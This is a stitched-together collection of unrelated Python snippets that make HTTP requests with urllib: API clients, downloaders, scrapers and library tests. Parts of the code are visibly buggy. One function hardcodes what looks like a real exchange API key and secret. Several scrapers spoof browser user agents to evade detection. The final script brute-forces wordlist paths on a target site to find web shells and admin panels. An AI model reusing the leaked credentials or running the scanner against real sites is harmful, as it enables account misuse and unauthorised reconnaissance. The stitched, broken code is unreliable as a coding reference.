def fetch(method, uri, params_prefix=None, **params): """Fetch the given uri and return the contents of the response.""" params = urlencode(_prepare_params(params, params_prefix)) binary_params = params.encode('ASCII') # build the HTTP request url = "https://%s/%s.xml" % (CHALLONGE_API_URL, uri) req = Request(url, binary_params) req.get_method = lambda: method # use basic authentication user, api_key = get_credentials() auth_handler = HTTPBasicAuthHandler() auth_handler.add_password( realm="Application", uri=req.get_full_url(), user=user, passwd=api_key ) opener = build_opener(auth_handler) try: response = opener.open(req) except HTTPError as e: if e.code != 422: raise # wrap up application-level errors doc = ElementTree.parse(e).getroot() if doc.tag != "errors": raise errors = [e.text for e in doc] raise ChallongeException(*errors) return response
def open_with_auth2(url): """ Open a urllib2 request, handling HTTP authentication In this version, user-agent is ignored """ scheme, netloc, path, params, query, frag = urlparse(url) if scheme in ('http', 'https'): auth, host = splituser(netloc) else: auth = None if auth: auth = "Basic " + unquote(auth).encode('base64').strip() new_url = urlunparse((scheme, host, path, params, query, frag)) request = Request(new_url) request.add_header("Authorization", auth) else: request = Request(url) # request.add_header('User-Agent', user_agent) fp = urlopen(request) if auth: # Put authentication info back into request URL if same host, # so that links found on the page will work s2, h2, path2, param2, query2, frag2 = urlparse(fp.url) if s2 == scheme and h2 == host: fp.url = urlunparse((s2, netloc, path2, param2, query2, frag2)) return fp
def _exec(self, action, params=None, post_params=None): """ Execute an API action :param str action: The action to be performed. Translated to REST call :param dict params: Additional GET parameters for action :param dict post_params: POST parameters for action :returns dict: The JSON result of the call in a dictionary format """ request_url = '%s/%s.%s' % (self.base_url, action, OneAll.FORMAT__JSON) if params: for ix, (param, value) in enumerate(params.items()): request_url += "%s%s=%s" % (('?' if ix == 0 else '&'), param, value) req = Request(request_url, dumps(post_params) if post_params else None, {'Content-Type': 'application/json'}) token = '%s:%s' % (self.public_key, self.private_key) auth = standard_b64encode(token.encode()) req.add_header('Authorization', 'Basic %s' % auth.decode()) req.add_header('User-Agent', self._get_user_agent_string()) try: request = urlopen(req) except HTTPError as e: if e.code == 401: raise BadOneAllCredentials else: raise return loads(request.read().decode())
def make_request(self, url, method, params): """Perform HTTP request and return the response.""" request = Request(url, str_to_bytes(params)) for key, val in items(self.http_headers): request.add_header(key, val) response = urlopen(request) # user catches errors. return response.read()
def test_ftp(self): class MockFTPWrapper: def __init__(self, data): self.data = data def retrfile(self, filename, filetype): self.filename, self.filetype = filename, filetype return io.StringIO(self.data), len(self.data) class NullFTPHandler(urllib.request.FTPHandler): def __init__(self, data): self.data = data def connect_ftp(self, user, passwd, host, port, dirs, timeout=socket._GLOBAL_DEFAULT_TIMEOUT): self.user, self.passwd = user, passwd self.host, self.port = host, port self.dirs = dirs self.ftpwrapper = MockFTPWrapper(self.data) return self.ftpwrapper import ftplib data = "rheum rhaponicum" h = NullFTPHandler(data) o = h.parent = MockOpener() for url, host, port, type_, dirs, filename, mimetype in [ ( "ftp://localhost/foo/bar/baz.html", "localhost", ftplib.FTP_PORT, "I", ["foo", "bar"], "baz.html", "text/html", ), ("ftp://localhost:80/foo/bar/", "localhost", 80, "D", ["foo", "bar"], "", None), ( "ftp://localhost/baz.gif;type=a", "localhost", ftplib.FTP_PORT, "A", [], "baz.gif", None, ), # XXX really this should guess image/gif ]: req = Request(url) req.timeout = None r = h.ftp_open(req) # ftp authentication not yet implemented by FTPHandler self.assert_(h.user == h.passwd == "") self.assertEqual(h.host, socket.gethostbyname(host)) self.assertEqual(h.port, port) self.assertEqual(h.dirs, dirs) self.assertEqual(h.ftpwrapper.filename, filename) self.assertEqual(h.ftpwrapper.filetype, type_) headers = r.info() self.assertEqual(headers.get("Content-type"), mimetype) self.assertEqual(int(headers["Content-length"]), len(data))
def parase_fq_factor(code): symbol = _code_to_symbol(code) try: request = Request(ct.HIST_FQ_FACTOR_URL%(symbol)) request.add_header("User-Agent", ct.USER_AGENT) text = urlopen(request, timeout=20).read() text = text[1:len(text)-1] text = text.decode('utf-8') if ct.PY3 else text text = text.replace('{_', '{"') text = text.replace('total', '"total"') text = text.replace('data', '"data"') text = text.replace(':"', '":"') text = text.replace('",_', '","') text = text.replace('_', '-') text = json.loads(text) df = pd.DataFrame({'date':list(text['data'].keys()), 'fqprice':list(text['data'].values())}) df['date'] = df['date'].map(_fun_except) # for null case if df['date'].dtypes == np.object: df['date'] = df['date'].astype(np.str) df = df.drop_duplicates('date') df = df.sort('date', ascending=False) df = df.set_index("date") df['fqprice'] = df['fqprice'].astype(float) return df except Exception as e: print(e)
def _add_logo(self, episode, audio): # APIC part taken from http://mamu.backmeister.name/praxis-tipps/pythonmutagen-audiodateien-mit-bildern-versehen/ url = episode.logo_url if url is not None: request = Request(url) request.get_method = lambda: "HEAD" try: response = urlopen(request) logo_type = response.getheader("Content-Type") if logo_type in ["image/jpeg", "image/png"]: img_data = urlopen(url).read() img = APIC( encoding=3, # 3 is for utf-8 mime=logo_type, type=3, # 3 is for the cover image desc="Station logo", data=img_data, ) audio.add(img) except (HTTPError, URLError) as e: message = "Error during capturing %s - %s" % (url, e) logging.error(message) except Exception as e: raise e
def shorten(url): """ 与えられたURLをgoo.glを使って短縮します settings.GOOGLE_URL_SHORTENER_API_KEYが設定されているときはそれを使って短縮します。 詳細は以下を参照してください https://developers.google.com/url-shortener/v1/getting_started#auth """ api_key = getattr(settings, 'GOOGLE_URL_SHORTENER_API_KEY', None) try: api_url = API_URL if api_key: api_url = '{}?key={}'.format(api_url, api_key) data = json.dumps({'longUrl': url}) data = data.encode('utf-8') request = Request(api_url, data) request.add_header('Content-Type', 'application/json') r = urlopen(request) json_string = r.read().decode("utf-8") return json.loads(json_string)['id'] except Exception as e: # fail silently logger = logging.getLogger('kawaz.core.utils') logger.exception("Failed to shorten `{}`".format(url)) return url
def a(url): file = url.split('/')[-1] u = urlopen(url) meta = u.info() file_size = int(meta.get_all("Content-Length")[0]) file_dl = 0 block_sz = 8192 if os.path.exists(file) and file_size == os.path.getsize(file): print("The file '%s' already exist." % file) exit() elif os.path.exists(file) and file_size != os.path.getsize(file): print("Resuming Download") f = open(file, "ab") dld = os.path.getsize(file) print("Downloading: {} Bytes: {}".format(file, file_size)) while True: buffer = u.read(dld) if not buffer: break req = Request(url) req.headers['Range'] = 'bytes=%s-%s' % (dld, file_size) buffer = urlopen(req).read() file_dl += len(buffer) f.write(buffer) remain = dld * 100./ file_size status = "\r%10d [%3.2f%%]" % (file_dl, file_dl * remain / file_size) status = status + chr(8)*(len(status)+1) time.sleep(1) sys.stdout.write(status) sys.stdout.flush() f.close() print("File: %s Downloaded Successfully" % (file)) exit() f = open(file, 'wb') print("Downloading: {} Bytes: {}".format(file, file_size)) while True: buffer = u.read(block_sz) if not buffer: break file_dl += len(buffer) f.write(buffer) status = "\r%10d [%3.2f%%]" % (file_dl, file_dl * 100. / file_size) status = status + chr(8)*(len(status)+1) time.sleep(1) sys.stdout.write(status) sys.stdout.flush() f.close() print("File: %s Downloaded Successfully" % (file))
def send_request( self, url, payload="", content_type="application/json", method="GET", raw=False, timeout=30, silent=False ): try: opener = build_opener(HTTPHandler) request = Request(url, data=bytes(payload, "UTF-8") if sys.version_info >= (3,) else bytes(payload)) request.add_header("Content-Type", content_type) request.get_method = lambda: method response = opener.open(request, timeout=timeout) buf = "" while 1: data = response.read() if not data: break buf += str(data, "UTF-8") if sys.version_info >= (3,) else data return json.loads(buf) if not raw else buf except socket.timeout: if not silent: print_color("Error: timed out while trying to communicate with %s:%d" % (self.host, self.port)) except URLError as e: if not silent: print_color("Error: %s while attempting to communicate with %s:%d" % (e.reason, self.host, self.port)) except ValueError as e: if not silent: print_color("Error: %s while trying to process result from Riak" % e) return None
def load(self, location, data=None, headers={}): if not location: raise LoginError() self.last_url = re.sub(r"https?:\/\/[^/]+", r"", location) heads = {"Accept-Encoding": "gzip, deflate", "User-Agent": self.core_cfg.get("User-Agent", "OTRS_US/0.0")} if "Cookies" in self.runt_cfg: heads["Cookie"] = self.runt_cfg["Cookies"] heads.update(headers) r = Request(location, data, headers=heads) try: pg = urlopen(r, timeout=60) except HTTPError as err: self.echo("HTTP Error:", err.getcode()) return except Exception as err: self.echo(repr(err)) return pd = pg.read() if pg.getheader("Content-Encoding") == "gzip": pd = decompress(pd) self.dump_data(pg, pd) if not self.check_login(pd.decode(errors="ignore")): raise LoginError(r.get_full_url()) return self.parse(pd)
def charger(chemin): request = Request(chemin) request.add_header('Accept-encoding', 'gzip') print('Connexion...') response = urlopen(request) info = response.info() sys.stdout.write('Chargement... ') sys.stdout.flush() temps = time.time() data = response.read() buf = BytesIO(data) temps = time.time() - temps print ('terminé en %.3f secondes, %d octets lus' % (temps, len(data))) sys.stdout.write('Decompression... ') sys.stdout.flush() temps = time.time() f = gzip.GzipFile(fileobj=buf) data = f.read() temps = time.time() - temps print('terminé en %.3f secondes, %d octets décompressés' % (temps, len(data))) texte = data.decode(errors='ignore') return texte
def download(url, tor=False): def create_connection(address, timeout=None, source_address=None): sock = socks.socksocket() sock.connect(address) return sock if tor: if not HAVE_SOCKS: print_error("Missing dependency, install socks (`pip install SocksiPy`)") return None socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, '127.0.0.1', 9050) socket.socket = socks.socksocket socket.create_connection = create_connection try: req = Request(url) req.add_header('User-agent', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)') res = urlopen(req) data = res.read() except HTTPError as e: print_error(e) except URLError as e: if tor and e.reason.errno == 111: print_error("Connection refused, maybe Tor is not running?") else: print_error(e) except Exception as e: print_error("Failed download: {0}".format(e)) else: return data
def cypher(query, **args): data = { "query": query, "params": args } data = json.dumps(data) req = Request( url="http://localhost:7474/db/data/cypher", data=data) req.add_header('Accept', 'application/json') req.add_header('Content-Type', 'application/json') try: resp = urlopen(req) except HTTPError as err: if err.code == 400: err = json.loads(err.read()) return print_error('', query, err) else: print(err) return else: resp = json.loads(resp.read()) columns = resp['columns'] rows = resp['data'] print_table(columns, rows)
def data(self): if not hasattr(self, '_data'): request = URLRequest(self.url) # Look in the cache for etag / last modified headers to use # TODO: "expires" header could be supported if self.env and self.env.cache: headers = self.env.cache.get( ('url', 'headers', self.url)) if headers: etag, lmod = headers if etag: request.add_header('If-None-Match', etag) if lmod: request.add_header('If-Modified-Since', lmod) # Make a request try: response = urlopen(request) except HTTPError as e: if e.code != 304: raise # Use the cached version of the url self._data = self.env.cache.get(('url', 'contents', self.url)) else: with contextlib.closing(response): self._data = response.read() # Cache the info from this request if self.env and self.env.cache: self.env.cache.set( ('url', 'headers', self.url), (response.headers.getheader("ETag"), response.headers.getheader("Last-Modified"))) self.env.cache.set(('url', 'contents', self.url), self._data) return self._data
def test_http_doubleslash(self): # Checks the presence of any unnecessary double slash in url does not # break anything. Previously, a double slash directly after the host # could could cause incorrect parsing. h = urllib.request.AbstractHTTPHandler() o = h.parent = MockOpener() data = "" ds_urls = [ "http://example.com/foo/bar/baz.html", "http://example.com//foo/bar/baz.html", "http://example.com/foo//bar/baz.html", "http://example.com/foo/bar//baz.html" ] for ds_url in ds_urls: ds_req = Request(ds_url, data) # Check whether host is determined correctly if there is no proxy np_ds_req = h.do_request_(ds_req) self.assertEqual(np_ds_req.unredirected_hdrs["Host"],"example.com") # Check whether host is determined correctly if there is a proxy ds_req.set_proxy("someproxy:3128",None) p_ds_req = h.do_request_(ds_req) self.assertEqual(p_ds_req.unredirected_hdrs["Host"],"example.com")
def make_request(self, url, method, params): """Makes an HTTP request and returns the response.""" request = Request(url, params) for key, val in items(self.http_headers): request.add_header(key, val) response = urlopen(request) # user catches errors. return response.read()
def upload(recipe, result, server, key=None): '''upload build''' branch = result.pop('branch', 'unknown') # FIXME: use urljoin request = Request('{}/build/{}/{}/{}'.format( server, quote(recipe['name']), quote(branch), quote('{} {}'.format(sys.platform, platform.machine())))) request.add_header('Content-Type', 'application/json') if key is not None: request.add_header('Authorization', key) try: urlopen(request, json.dumps(result).encode('UTF-8')) except HTTPError as exc: logging.error("The server couldn't fulfill the request.") logging.error('Error code: %s', exc.code) if exc.code == 400: logging.error("Client is broken, wrong syntax given to server") elif exc.code == 401: logging.error("Wrong key provided for project.") logging.error("%s", exc.read()) return False except URLError as exc: logging.error('Failed to reach a server.') logging.error('Reason: %s', exc.reason) return False return True
def raw(ctx, method, url, datafp=None): """Do the raw http method call on url.""" if method not in ("GET", "POST", "PUT", "DELETE"): raise ValueError("HTTP method '{}' is not known".format(method)) if method in ("PUT", "DELETE"): raise NotImplementedError("HTTP method '{}' is not yet implemented".format(method)) #TODO: we need a real debugging print("DEBUG: {} {}".format(method, url)) data = None request = Request(url) if hasattr(request, method): request.method = method else: request.get_method = lambda: method if method == "POST": data = datafp.read() if datafp is not None else b"" request.add_header("Content-Type", "application/octet-stream") response = ctx.opener.open(request, data) if response.getcode() != 200: raise NotImplementedError("non 200 responses are not yet implemented") return response
def _add_logo(self, show, audio): # APIC part taken from http://mamu.backmeister.name/praxis-tipps/pythonmutagen-audiodateien-mit-bildern-versehen/ url = show.station.logo_url if url is not None: request = Request(url) request.get_method = lambda: 'HEAD' try: response = urlopen(request) logo_type = response.info().gettype() if logo_type in ['image/jpeg', 'image/png']: img_data = urlopen(url).read() img = APIC( encoding=3, # 3 is for utf-8 mime=logo_type, type=3, # 3 is for the cover image desc=u'Station logo', data=img_data ) audio.add(img) except (HTTPError, URLError) as e: message = "Error during capturing %s - %s" % (url, e) self.log.error(message) except Exception as e: raise e
def __init__(self, name) : """ @param name: URL to be opened @keyword additional_headers: additional HTTP request headers to be added to the call """ try : # Note the removal of the fragment ID. This is necessary, per the HTTP spec req = Request(url=name.split('#')[0]) req.add_header('Accept', 'text/html, application/xhtml+xml') self.data = urlopen(req) self.headers = self.data.info() if URIOpener.CONTENT_LOCATION in self.headers : self.location = urlparse.urljoin(self.data.geturl(),self.headers[URIOpener.CONTENT_LOCATION]) else : self.location = name except urllib_HTTPError : e = sys.exc_info()[1] from pyMicrodata import HTTPError msg = BaseHTTPRequestHandler.responses[e.code] raise HTTPError('%s' % msg[1], e.code) except Exception : e = sys.exc_info()[1] from pyMicrodata import MicrodataError raise MicrodataError('%s' % e)
def test_can_post_data(self): cas_base = 'https://example.com' url = 'https://example.com/abc' headers = { 'soapaction': 'http://www.oasis-open.org/committees/security', 'cache-control': 'no-cache', 'pragma': 'no-cache', 'accept': 'text/xml', 'connection': 'keep-alive', 'content-type': 'text/xml' } params = {'TARGET': url} uri = '{}cas/samlValidate?{}'.format(cas_base, urlencode(params)) request = Request(uri, '', headers) request.data = get_saml_assertion('ticket') try: urlopen(request) except URLError: # As long as this isn't a TypeError, and the url request # was actually made, then we can assert that # get_saml_assertion() is good. This is to prevent an # issue introduced since Python 3: # # POST data should be bytes or an iterable of bytes. It # cannot be of type str. # pass
def login(self, loc=None): if loc is None: loc = self.get_setting('BASE_LOCATION') login_url = self.get_setting('BASE_URL') + \ self.get_setting('LOGIN_LOCATION') cookies = HTTPCookieProcessor() opener = build_opener(cookies) opener.open(login_url) try: token = [x.value for x in cookies.cookiejar if x.name == 'csrftoken'][0] except IndexError: raise IOError("No csrf cookie found") params = dict(username=self.get_setting('LOGIN_USERNAME'), password=self.get_setting('LOGIN_PASSWORD'), next=loc, csrfmiddlewaretoken=token) encoded_params = urlparse.urlencode(params).encode('utf-8') req = Request(login_url, encoded_params) req.add_header('Referer', login_url) response = opener.open(req) if response.geturl() == login_url: raise IOError("Authentication refused") return opener, response
def authenticate(self, request): adhocracy_base_url = settings.PC_SERVICES["references"]["adhocracy_api_base_url"] user_path = request.META.get("HTTP_X_USER_PATH") user_token = request.META.get("HTTP_X_USER_TOKEN") user_url = urljoin(adhocracy_base_url, user_path) if user_path is None and user_token is None: return None elif user_path is None or user_token is None: raise exceptions.AuthenticationFailed("No `X-User-Path` and `X-User-Token` header provided.") request = Request("%s/principals/groups/gods" % adhocracy_base_url) request.add_header("X-User-Path", user_path) request.add_header("X-User-Token", user_token) response = urlopen(request) if response.status == 200: content_type, params = parse_header(response.getheader("content-type")) encoding = params["charset"].lower() if content_type != "application/json": exceptions.AuthenticationFailed("Adhocracy authentification failed due wrong response.") resource_as_string = response.read().decode(encoding) gods_group_resource = json.loads(resource_as_string) gods = gods_group_resource["data"]["adhocracy_core.sheets.principal.IGroup"]["users"] if user_url in gods: is_god = True else: is_god = False return AdhocracyUser(user_path, is_god), None else: raise exceptions.AuthenticationFailed("Adhocracy authentification failed due invalid credentials.")
def get_page_urls(url, user_agent=None): req = Request(url) if user_agent: req.add_header('User-Agent', user_agent) response = urlopen(req) urls = REGEX_URLS.findall(str(response.read())) return set(url[0].strip('"\'') for url in urls)
def getURLInfo(self, url=None): ''' @see: IURLInfoService.getURLInfo ''' if not url: raise InputError('Invalid URL %s' % url) assert isinstance(url, str), 'Invalid URL %s' % url url = unquote(url) try: with urlopen(url) as conn: urlInfo = URLInfo() urlInfo.URL = url urlInfo.Date = datetime.now() contentType = None for tag, val in conn.info().items(): if tag == 'Content-Type': contentType = val.split(';')[0].strip().lower(); break if not contentType or contentType != 'text/html': req = Request(url) selector = req.get_selector().strip('/') if selector: parts = selector.split('/') if parts: urlInfo.Title = parts[len(parts) - 1] else: urlInfo.Title = req.get_host() return urlInfo elif contentType == 'text/html': urlInfo.ContentType = contentType extr = HTMLInfoExtractor(urlInfo) try: extr.feed(conn.read().decode()) except (AssertionError, HTMLParseError, UnicodeDecodeError): pass return extr.urlInfo except (URLError, ValueError): raise InputError('Invalid URL %s' % url)
def download(self, request): """ """ mimetype = 'application/x-ofx' HTTPheaders = {'Content-type': mimetype, 'Accept': '*/*, %s' % mimetype} # py3k - ElementTree.tostring() returns bytes not str request = self.ofxheader + ET.tostring(request).decode() # py3k: urllib.request wants bytes not str request = Request(self.url, request.encode(), HTTPheaders) try: with contextlib.closing(urlopen(request)) as response: # py3k: urlopen returns bytes not str response_ = response.read().decode() # urllib2.urlopen returns an addinfourl instance, which supports # a limited subset of file methods. Copy response to a StringIO # so that we can use tell() and seek(). source = StringIO() source.write(response_) # After writing, rewind to the beginning. source.seek(0) self.response = source return source except HTTPError as err: # FIXME print(err.info()) raise
def test_invalid_redirect(self): from_url = "http://example.com/a.html" valid_schemes = ["http", "https", "ftp"] invalid_schemes = ["file", "imap", "ldap"] schemeless_url = "example.com/b.html" h = urllib.request.HTTPRedirectHandler() o = h.parent = MockOpener() req = Request(from_url) req.timeout = socket._GLOBAL_DEFAULT_TIMEOUT for scheme in invalid_schemes: invalid_url = scheme + "://" + schemeless_url self.assertRaises( urllib.error.HTTPError, h.http_error_302, req, MockFile(), 302, "Security Loophole", MockHeaders({"location": invalid_url}), ) for scheme in valid_schemes: valid_url = scheme + "://" + schemeless_url h.http_error_302(req, MockFile(), 302, "That's fine", MockHeaders({"location": valid_url})) self.assertEqual(o.req.get_full_url(), valid_url)
def http_request(self, request): """Processes cookies for a HTTP request. @param request: request to process @type request: urllib2.Request @return: request @rtype: urllib2.Request """ COOKIE_HEADER_NAME = "Cookie" tmp_request = Request_(request.get_full_url(), request.data, {}, request.origin_req_host, request.unverifiable) self.cookiejar.add_cookie_header(tmp_request) # Combine existing and new cookies. new_cookies = tmp_request.get_header(COOKIE_HEADER_NAME) if new_cookies: if request.has_header(COOKIE_HEADER_NAME): # Merge new cookies with existing ones. old_cookies = request.get_header(COOKIE_HEADER_NAME) merged_cookies = '; '.join([old_cookies, new_cookies]) request.add_unredirected_header(COOKIE_HEADER_NAME, merged_cookies) else: # No existing cookies so just set new ones. request.add_unredirected_header(COOKIE_HEADER_NAME, new_cookies) return request
def download(url, target): ''' download(string, string) -> boolean Downloads content from a given URL and saves it to the given target location. Return True if the content was successfully downloaded, or False if the download fails (no content, target already exists). Keyword arguments: url -- url of content (e.g: http://../hello.png) target -- filesystem location to save the content to return True if success, False if otherwise ''' if path.exists(target): print("Error retrieving image: file target '%s' already exists." % target) return False opener = build_opener() req = Request(url) req.add_header('User-Agent', 'Mozilla/5.0') try: fp = opener.open(req) with open(target, "wb") as fo: fo.write(fp.read()) return True except: print("Error fetching content: ", sys.exc_info()[0]) return False
from urllib.request import Request, urlopen from urllib.error import URLError, HTTPError import sys if len(sys.argv) < 2: print("missing \"url\" argument, exiting...") exit() else: url = sys.argv[1] req = Request(url) try: response = urlopen(req) except HTTPError as e: print('The server couldn\'t fulfill the request.') print('Error code: ', e.code) except URLError as e: print('We failed to reach a server.') print('Reason: ', e.reason) else: print ('Website is working fine')
def main(): write_directory = 'raw_data' #simulating web browser URL = 'https://api.covid19api.com/total/country/' headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.3'} #making write_directory if it doesn't exist if not os.path.exists(write_directory): os.mkdir(write_directory) print('Reading countries.csv') try: csv_reader = csv.reader(open('countries.csv', 'r'), delimiter=',') except: print('Failed to read countries.csv') quit() #reading total no of countries row_count = sum(1 for row in csv_reader) csv_reader = csv.reader(open('countries.csv', 'r'), delimiter=',') #fail counter intialization count = 0; fail = 0 fail_list = list() print('Downloading Data...') #browsing through each entry in the file for countries in csv_reader: country = countries[1] #print(country) reg_url = URL + country count = count + 1 #downloading data, and accepting only valid data try: print('[{0:.2f}%] '.format((count/row_count)*100) + reg_url) req = Request(url=reg_url, headers=headers) html = urlopen(req).read() except: print('\nFailed to retrive data from ' + reg_url + '\n') fail = fail + 1 fail_list.append(countries[0]) continue; try: data = pd.DataFrame(json.loads(html.decode())) data = data[['Confirmed', 'Deaths', 'Recovered', 'Active', 'Date']] except: print('\nRecieved invalid response from ' + reg_url + '\n') fail = fail + 1 fail_list.append(countries[0]) continue; filename = countries[0] + '.csv' data.to_csv(write_directory + '/' + filename,index=False) #printing fail report if fail > 0: print('No. of Failures : ' + str(fail)) read = input('Press \'x\' to view them, or else press any other key : ') if read == 'x': print(fail_list)
def placeOrder(price): order = { "instrument": "CREX-BTC", "side": "sell", "volume": 0.0002, "price": price } baseUrl = "https://api.crex24.com" apiKey = "0515be61-853e-48ad-b6fa-424d768e2d6a" secret = "mCHnfAWVU+Q8V5yZQHaaAaaGIF+eIjn4joDQAFWIPUKPzsOFBbH18uWchNPOiPBL7L015YJDuLL3KYL9Lqb7RQ==" path = "/v2/trading/placeOrder" body = json.dumps(order, separators=(',', ':')) nonce = round(datetime.datetime.now().timestamp() * 1000) key = base64.b64decode(secret) message = str.encode(path + str(nonce) + body, "utf-8") hmac3 = hmac.new(key, message, sha512) signature = base64.b64encode(hmac3.digest()).decode() request = Request(baseUrl + path) request.method = "POST" request.data = str.encode(body, "utf-8") request.add_header("Content-Length", len(body)) request.add_header("X-CREX24-API-KEY", apiKey) request.add_header("X-CREX24-API-NONCE", nonce) request.add_header("X-CREX24-API-SIGN", signature) try: response = urlopen(request) except HTTPError as e: response = e status = response.getcode() body = bytes.decode(response.read()) # print("Status code: " + str(status)) # print(body) arr = json.loads(body) data = 0 for key in arr: # key это dict for i in key: if i == "id": data = key[i] return data
def call_api(): """ Call an api using the Access Token :return: the index template with the data from the api in the parameter 'data' """ if 'session_id' in session: user = _session_store.get(session['session_id']) if not user: return redirect_with_baseurl('/') if 'api_endpoint' in _config: user.api_response = None if "front-end" in request.args and user.front_end_access_token: access_token = user.front_end_access_token elif user.access_token: access_token = user.access_token else: user.api_response = None print('No access token in session') return redirect_with_baseurl("/") try: req = Request(_config['api_endpoint']) req.add_header('User-Agent', 'CurityExample/1.0') req.add_header("Authorization", "Bearer %s" % access_token) req.add_header("Accept", 'application/json') if 'subscription_key' in _config: req.add_header('Ocp-Apim-Subscription-Key', _config['subscription_key']) req.add_header('Ocp-Apim-Trace', 'true') response = urlopen(req, context=tools.get_ssl_context(_config)) user.api_response = {'code': response.code, 'data': response.read()} except HTTPError as e: user.api_response = {'code': e.code, 'data': e.read()} except Exception as e: message = e.message if len(e.message) > 0 else "unknown error" user.api_response = {"code": "unknown error", "data": message} else: user.api_response = None print('No API endpoint configured') return redirect_with_baseurl('/')
from bs4 import BeautifulSoup as soup import random import pandas as pd from datetime import date Date = [] Item_Name = [] Price = [] UPC = [] Page_Link = [] base_url = 'https://www.bestbuy.com' for x in range(1, 33): url = 'https://www.bestbuy.com/site/laptop-computers/all-laptops/pcmcat138500050001.c?cp=' + str( x) + '&id=pcmcat138500050001&intl=nosplash' try: req12 = Request(url, headers={'User-Agent': 'Mozilla/5.0'}) page_html12 = uReq(req12).read() page_soup12 = soup(page_html12, "html.parser") containers = page_soup12.findAll("div", {"class", "sku-title"}) for container in containers: links = base_url + container.h4.a['href'] + '&intl=nosplash' req = Request(links, headers={'User-Agent': 'Mozilla/5.0'}) page_html = uReq(req).read() page_soup = soup(page_html, "html.parser") Page_Link.append(links) today = date.today() Date.append(today) Name = page_soup.findAll( "h1", {"class", "heading-5 v-fw-regular"})[0].text.replace(",", "|") Item_Name.append(Name)
def by_size(words, size): return [word for word in words if len(word) > size] answerFinalList = by_size(answersList, 1) print(answerFinalList) # Sacar el recuento de aparicion de las respuestas en la busqueda url = u"https://www.google.es/search?q=" + questiontext.replace(' ', '+') print(url) url = url + "&start=0" print(url) unaccented_url = unidecode.unidecode(url) page = Request(unaccented_url, headers={'User-Agent': 'Mozilla/5.0'}) # Para que no detecten el spider webpage = urlopen(page).read() # find = webpage.find(answerFinalList[1].encode()) counter = [(x, webpage.find(x.encode())) for x in answerFinalList] print(counter) # Plotear el recuento en la pantalla if len(counter) == 3: print(counter) #label = tkinter.Label(text=counter, font=('Times New Roman', '20'), fg='red', bg='white') #label.master.overrideredirect(True) #label.master.geometry("+1050+250") #label.master.lift() #label.master.wm_attributes("-topmost", True) #label.master.wm_attributes("-disabled", True) #label.master.wm_attributes("-transparentcolor", "white")
download_pictures_yn = str(input("Download pictures? (y/n) ")).lower() if download_pictures_yn in yes: filename_pictures = str(input("How should the image files be named? ")) filepath_pictures = filename_pictures + '/' + filename_pictures #sets google url according to input google_url = 'https://www.google.ch/search?site=webhp&tbm=isch&source=hp&q=' + search_term + '&oq=' + search_term #just checking the search url for mistakes print("Checking following URL:\n" + google_url + "\n") #adding headers to fool google req = Request( google_url, headers={ 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36' }) soup = BeautifulSoup(urllib.request.urlopen(req), 'html.parser') # for debugging and reverse engineering purposes #open('souptest1.html', 'w').write(str(soup.encode("utf-8"))) #open('souptest2.txt', 'w').write(str(soup)) #find all divs with class rg_meta because that's where the links are divs = soup.findAll("div", {"class": "rg_meta"}) link_counter = 0 exception_counter = 0 for div in divs:
def send_request(url, header, body): req = Request(url, body.encode('utf-8'), header) response = urlopen(req) response_str = response.read() return response_str
def update_page_for_platform(command, platform, remote, language): page_url = get_page_url(platform, command, remote, language) data = urlopen(Request(page_url, headers=REQUEST_HEADERS), context=URLOPEN_CONTEXT).read() store_page_to_cache(data, command, platform, language)
def scan(self): # argument parser like shit parser = argparse.ArgumentParser( prog="CantiX.py", description="Simple Find Shell in Website") parser.add_argument("-u", dest="domain", help="your url") parser.add_argument("-w", dest="wordlist", help="your wordlsit") args = parser.parse_args() if not args.domain: sys.exit("" + W + "usage: - - ") if not args.wordlist: sys.exit("" + W + "usage: - - ") # handle url website format site = args.domain print("" + W + "Start Scan!... ") print("" + W + "Mohon Tunggu Sebentar...") time.sleep(3) if not site.startswith("http://"): site = "http://" + site if not site.endswith("/"): site = site + "/" # load wordlist try: pathlist = args.wordlist wlist = open(pathlist, "r") wordlist = wlist.readlines() except FileNotFound as e: print("" + M + " - - ") exit() finally: try: wlist.close() except: print("" + W + "Close - - ") # user-agent user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36" #list to hold the results we find found = [] # respon code resp_codes = {403: "403 forbidden", 401: "401 unauthorized"} # loop with join pathlist starttime = time.time() for psx in wordlist: try: psx = psx.replace("\n", "") url = site + psx req = Request(url, headers={"User-Agent": user_agent}) time.sleep(0.1) try: connection = urlopen(req) print( "\033[96m[\033[90m{0}\033[96m]".format( time.strftime("%H:%M:%S")), "\033[92mFound :", "\033[0m/" + psx) found.append(url) except HTTPError as e: if e.code == 404: print( "\033[96m[\033[90m{0}\033[96m]".format( time.strftime("%H:%M:%S")), "\033[91mError :", "\033[0m/" + psx) else: print( "\033[96m[\033[90m{0}\033[96m]".format( time.strftime("%H:%M:%S")), "\033[92mInfo :", "\033[33m/" + psx, "\033[92mstatus:\033[33m", resp_codes[e.code]) except URLError as e: sys.exit("\033[31m[!] Upss, Cek Koneksi Jaringan Kamu") except Exception as er: print("\033[93m[!] \033[0mExit Program") time.sleep(3) exit() except KeyboardInterrupt as e: print("" + C + "CTRL+C Terdeteksi") print("\033[96m[!] \033[0mExit Program") time.sleep(2) exit() if found: print("" + C + "_::" + H + "Result Found" + C + "::_" + H + " ") print("\n".join(found)) print( "\033[96m[?] \033[0mTime Elasped: \033[35m%.2f\033[0m Seconds" % float(time.time() - starttime)) else: print("\n\033[96m[!] \033[0mCould Not Find Any Admin") print( "\033[96m[?] \033[0mTime Elasped: \033[33m%.2f\033[0m Seconds" % float(time.time() - starttime))
